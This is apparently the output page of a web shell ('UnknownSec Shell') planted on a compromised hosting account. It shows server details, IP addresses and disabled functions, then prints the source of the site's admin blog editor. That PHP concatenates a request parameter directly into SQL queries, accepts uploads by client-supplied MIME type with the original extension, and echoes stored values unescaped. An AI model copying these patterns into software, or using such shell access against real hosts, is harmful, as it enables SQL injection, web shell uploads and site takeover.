shell bypass 403

UnknownSec Shell

: /home/az2015/public_html/admin/ [ drwxr-xr-x ]
Uname: Linux gains.arrowcloudlinux.com 4.18.0-553.22.1.lve.1.el8.x86_64 #1 SMP Tue Oct 8 15:52:54 UTC 2024 x86_64
Software: Apache
PHP version: 7.4.33 [ PHP INFO ] PHP os: Linux
Server Ip: 131.153.51.35
Your Ip: 18.118.128.17
User: az2015 (2658) | Group: az2015 (2661)
Safe Mode: OFF
Disable Function:
allow_url_include,show_source,symlink,system, passthru, exec, popen, pclose, proc_open, proc_terminate, proc_get_status, proc_close, proc_nice, allow_url_fopen, shell-exec, shell_exec, fpassthru, base64_encodem, escapeshellcmd, escapeshellarg, crack_check, crack_closedict, crack_getlastmessage, crack_opendict, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid, posix_setuid, dl, escap,phpinfo

name : edit_blogs.php
<?php
session_start();
include('../include/dbconnect.php');
include('include/sessioncheck.php');
$Msg="";
	if(isset($_POST["slid_update"])){
	    $mTitle=mysqli_real_escape_string($con,$_POST["mTitle"]);
        $mDesc=mysqli_real_escape_string($con,$_POST["mDesc"]);
        $mKey=mysqli_real_escape_string($con,$_POST["mKey"]);
		$s_title=mysqli_real_escape_string($con,$_POST["title"]);
        $s_content=mysqli_real_escape_string($con,$_POST["service_content"]);
		if(!empty($_FILES["s_img"]["name"]))
		{
			if(isImage($_FILES["s_img"]["type"]))
			{
				$img_extension=explode('.',$_FILES["s_img"]["name"]);
				$s_img="images/blogs/"."wp".uniqid().".".end($img_extension);
				$move_img=move_uploaded_file($_FILES["s_img"]["tmp_name"],"../".$s_img);
				
				$update_slider_sql="UPDATE blogs SET  mTitle='".$mTitle."',mDesc='".$mDesc."',mKey='".$mKey."',prj_title='".$s_title."',prj_content='".$s_content."',prj_img='".$s_img."' WHERE prj_id='".$_REQUEST["edit_sli"]."'";
				//die($update_slider_sql);
				mysqli_query($con,$update_slider_sql) or die('Update Failed');
				$Msg=showSuccessAlert('Project Images Updated Successfully',$con);
			}
			else{
				
				$Msg=showErrorAlert('Please Upload a Valid Image',$con);
			}
			
		}
          $update_slider_sql="UPDATE blogs SET  mTitle='".$mTitle."',mDesc='".$mDesc."',mKey='".$mKey."',prj_title='".$s_title."',prj_content='".$s_content."' WHERE prj_id='".$_REQUEST["edit_sli"]."'";
			//	die($update_slider_sql);
				mysqli_query($con,$update_slider_sql) or die('Update Failed');
				$Msg=showSuccessAlert('Blogs Updated Successfully',$con);
	}
?>
<!DOCTYPE html>
<html lang="en">
   <head>
      <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
      <!-- Meta, title, CSS, favicons, etc. -->
      <meta charset="utf-8">
      <meta http-equiv="X-UA-Compatible" content="IE=edge">
      <meta name="viewport" content="width=device-width, initial-scale=1">
      <title><?php echo TITLE; ?></title>
      <!-- Bootstrap -->
      <link href="css/bootstrap.min.css" rel="stylesheet">
      <link rel="stylesheet" type="text/css" href="css/bootstrap-fileupload.css">
      <!-- Font Awesome -->
      <link rel="stylesheet" href="http://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.6.3/css/font-awesome.min.css">
      <link href="css/font-awesome.min.css" rel="stylesheet">
      <!-- Custom Theme Style -->
      <link href="css/custom.min.css" rel="stylesheet">
        <script src="js/jquery.js"></script>
   </head>
   <body class="nav-md">
      <div class="container body">
         <div class="main_container">
            <div class="col-md-3 left_col">
               <div class="left_col scroll-view">
              
                  <?php include('include/sidebar.php'); ?>
                  <!-- /menu footer buttons -->
                  <div class="sidebar-footer hidden-small">
                     <a data-toggle="tooltip" data-placement="top" title="Settings">
                     <span class="glyphicon glyphicon-cog" aria-hidden="true"></span>
                     </a>
                     <a data-toggle="tooltip" data-placement="top" title="FullScreen">
                     <span class="glyphicon glyphicon-fullscreen" aria-hidden="true"></span>
                     </a>
                     <a data-toggle="tooltip" data-placement="top" title="Lock">
                     <span class="glyphicon glyphicon-eye-close" aria-hidden="true"></span>
                     </a>
                     <a data-toggle="tooltip" data-placement="top" title="Logout">
                     <span class="glyphicon glyphicon-off" aria-hidden="true"></span>
                     </a>
                  </div>
                  <!-- /menu footer buttons -->
               </div>
            </div>
            <!-- top navigation -->
            <?php include('include/header.php'); ?>
            <!-- /top navigation -->
            <!-- page content -->
            <div class="right_col" role="main">
               <div class="">
                  <div class="clearfix"></div>
                  <div class="row">
                     <div class="col-md-12 col-sm-12 col-xs-12">
                        <div class="x_panel">
                           <div class="x_title">
                              <h2> Blog Details<!--<small>different form elements</small>--></h2>
                              <ul class="nav navbar-right panel_toolbox">
                                <li><a href="blogs.php" class="btn btn-success" style="color:#fff;">Go Back</a>
                                 </li>
                                 <li><a class="collapse-link"><i class="fa fa-chevron-up"></i></a>
                                 </li>
                                 <li><a class="close-link"><i class="fa fa-close"></i></a>
                                 </li>
                              </ul>
                              <div class="clearfix"></div>
                           </div>
                           <div class="x_content">
                              <br />
                              <form method="post" enctype="multipart/form-data" class="form-horizontal form-label-left">
                              <?php
								$dis_slider_sql="SELECT * FROM blogs WHERE prj_id='".$_REQUEST["edit_sli"]."'";
								$dis_slider_exe=mysqli_query($con,$dis_slider_sql);
                               
								$dis_slider_result=mysqli_fetch_array($dis_slider_exe);
                                   
						    ?>
						           <div class="form-group">
                                    <label class="control-label col-md-3 col-sm-3 col-xs-12">Meta Title <span class="required">*</span>
                                    </label>
                                    <div class="col-md-4 col-sm-6 col-xs-12">
                                       <input type="text" name="mTitle" value="<?php echo $dis_slider_result["mTitle"]; ?>" class="form-control col-md-7 col-xs-12" required>
                                    </div>
                                 </div>
                                  <div class="form-group">
                                    <label class="control-label col-md-3 col-sm-3 col-xs-12">Meta Description <span class="required">*</span>
                                    </label>
                                    <div class="col-md-4 col-sm-6 col-xs-12">
                                       <input type="text" name="mDesc" value="<?php echo $dis_slider_result["mDesc"]; ?>" class="form-control col-md-7 col-xs-12" required>
                                    </div>
                                 </div>
                                  <div class="form-group">
                                    <label class="control-label col-md-3 col-sm-3 col-xs-12">Meta Keywords <span class="required">*</span>
                                    </label>
                                    <div class="col-md-4 col-sm-6 col-xs-12">
                                       <input type="text" name="mKey" value="<?php echo $dis_slider_result["mKey"]; ?>" class="form-control col-md-7 col-xs-12" required>
                                    </div>
                                 </div>
                                 
                                  <div class="form-group">
                                    <label class="control-label col-md-3 col-sm-3 col-xs-12">Title <span class="required">*</span>
                                    </label>
                                    <div class="col-md-4 col-sm-6 col-xs-12">
                                       <input type="text" name="title" value="<?php echo $dis_slider_result["prj_title"]; ?>" class="form-control col-md-7 col-xs-12" required>
                                    </div>
                                 </div>
                                <div class="form-group">
								  <div class="col-md-12">
									<label class="col-md-3 control-label">Content <span class="required">*</span></label>
									<div class="col-md-9">
										<textarea class="form-control ckeditor" name="service_content" rows="6" required><?php echo $dis_slider_result["prj_content"]; ?></textarea>
									</div>
								  </div>
							   </div>
                               <div class="form-group">
                                <label class="col-md-3 control-label">Image <span class="required">*</span></label>
                                <div class="col-md-8">
                                    <div class="fileupload fileupload-new" data-provides="fileupload">
                                        <div class="fileupload-new thumbnail" style="width: 200px; height: 150px;">
                                            <img src="<?php echo "../".$dis_slider_result["prj_img"]; ?>" alt="" style="height:270px; width:370px;"/>
                                        </div>
                                        <div class="fileupload-preview fileupload-exists thumbnail" style="max-width: 200px; max-height: 150px; line-height: 20px;"></div>
                                        <div>
                                            <span class="btn btn-white btn-file">
                                                <span class="fileupload-new"><i class="fa fa-paper-clip"></i> Select image</span>
                                                <span class="fileupload-exists"><i class="fa fa-undo"></i> Change</span>
                                                <input type="file" name="s_img" accept="image/*" class="default" />
                                            </span>
                                            <a href="#" class="btn btn-danger fileupload-exists" data-dismiss="fileupload"><i class="fa fa-trash"></i> Remove</a>
                                        </div>
                                    </div>
                                    <!--<span class="label label-danger">NOTE!</span>&nbsp;
                                    <span></span>-->
                                </div>
                              </div>     
                                 <div class="ln_solid"></div>
                                 <div class="form-group">
                                    <div class="col-md-6 col-sm-6 col-xs-12 col-md-offset-3">
                                       <button type="submit" class="btn btn-primary">Cancel</button>
                                       <button type="submit" name="slid_update" class="btn btn-success">Update</button>
                                    </div>
                                 </div>
                              </form>
                           </div>
                        </div>
                     </div>
                  </div>
           <?php include('include/footer.php'); ?>
         </div>
      </div>
      <!-- jQuery -->
    
        <script src="js/jquery.min.js"></script>
       <script src="js/bootstrap.min.js"></script>
      <script src="validate/parsley.min.js"></script>
       <script src="js/jquery.js"></script>
      <script src="js/jquery-1.8.3.min.js"></script>
      <!-- Bootstrap -->
      <script type="text/javascript" src="js/bootstrap-fileupload.js"></script>
      <script src="js/bootstrap.min.js"></script>
       <script type="text/javascript" src="js/ckeditor/ckeditor.js"></script>
      <script src="js/moment.min.js"></script>
      <script src="js/daterangepicker.js"></script>
      <!-- Custom Theme Scripts -->
      <script src="js/custom.min.js"></script>
   </body>
</html>

© 2024 UnknownSec